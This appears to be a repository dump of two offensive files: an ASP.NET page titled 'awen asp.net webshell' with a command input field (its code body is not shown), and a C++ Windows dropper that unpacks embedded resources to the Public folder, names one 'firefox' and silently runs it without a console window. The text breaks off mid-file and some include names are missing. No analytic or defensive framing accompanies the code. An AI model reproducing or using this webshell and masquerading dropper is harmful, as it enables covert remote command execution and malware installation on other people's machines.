├── shell.aspx └── embded.cpp /shell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" Debug="true" Trace="false" %> 2 | 3 | <%@ Import Namespace="System.Diagnostics" %> 4 | 5 | <%@ Import Namespace="System.IO" %> 6 | 7 | 54 | 55 | 56 | 57 | 58 | 59 | awen asp.net webshell 60 | 61 | 62 | 63 | 64 | 65 |
66 | 67 | 68 | 69 | 70 | 71 | Command: 72 | 73 |
74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /embded.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "resource2.h" 5 | #include "resource3.h" 6 | #define filename1 "c:\\Users\\Public\\file" 7 | 8 | #define filename2 "c:\\Users\\Public\\firefox" 9 | 10 | using namespace std; 11 | void firefox() { 12 | 13 | DWORD num=0; 14 | HRSRC hRes = FindResource( 0, L"#103", L"STRING" ); 15 | HGLOBAL hData = LoadResource( 0, hRes ); 16 | LPVOID data = LockResource( hData ); 17 | DWORD size = SizeofResource(0, hRes); 18 | 19 | HANDLE hFile3 = CreateFileA(filename2,(GENERIC_READ | GENERIC_WRITE), (FILE_SHARE_READ | FILE_SHARE_WRITE), NULL, 1, FILE_ATTRIBUTE_NORMAL, NULL); 20 | int ret=WriteFile(hFile3,data,size,&num,NULL); 21 | CloseHandle(hFile3); 22 | 23 | 24 | 25 | STARTUPINFO si; 26 | PROCESS_INFORMATION pi; 27 | 28 | ZeroMemory( &si, sizeof(si) ); 29 | si.cb = sizeof(si); 30 | ZeroMemory( &pi, sizeof(pi) ); 31 | if (! 32 | CreateProcess 33 | ( 34 | 35 | TEXT(filename2), 36 | NULL,NULL,NULL,FALSE, 37 | CREATE_NEW_CONSOLE, 38 | NULL,NULL, 39 | &si, 40 | &pi 41 | ) 42 | ) 43 | { 44 | cout << "Unable to execute."; 45 | }} 46 | 47 | 48 | using namespace std; 49 | #pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup") 50 | int main() 51 | { 52 | 53 | DWORD num=0; 54 | HRSRC hRes = FindResource( 0, L"#101", L"STRING" ); 55 | HGLOBAL hData = LoadResource( 0, hRes ); 56 | LPVOID data = LockResource( hData ); 57 | DWORD size = SizeofResource(0, hRes); 58 | 59 | HANDLE hFile3 = CreateFileA(filename1,(GENERIC_READ | GENERIC_WRITE), (FILE_SHARE_READ | FILE_SHARE_WRITE), NULL, 1, FILE_ATTRIBUTE_NORMAL, NULL); 60 | int ret=WriteFile(hFile3,data,size,&num,NULL); 61 | CloseHandle(hFile3); 62 | 63 | 64 | //int result = system(filename1); 65 | 66 | 67 | thread t(firefox); 68 | 69 | 70 | //cout<